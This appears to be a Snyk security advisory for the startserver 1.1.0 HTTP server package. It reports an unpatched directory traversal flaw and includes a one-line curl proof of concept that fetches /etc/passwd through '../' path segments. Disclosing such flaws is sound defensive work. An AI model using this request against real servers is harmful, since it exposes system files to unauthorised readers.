startserver@1.1.0 vulnerabilities

Yet another http server

Direct Vulnerabilities

Known vulnerabilities in the startserver package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free
VulnerabilityVulnerable Version
  • H
Directory Traversal

startserver is a Yet another http server

Affected versions of this package are vulnerable to Directory Traversal due to missing sanitization.

PoC

curl --path-as-is --url "http://localhost:8080/../../../../etc/passwd"

How to fix Directory Traversal?

There is no fixed version for startserver.

*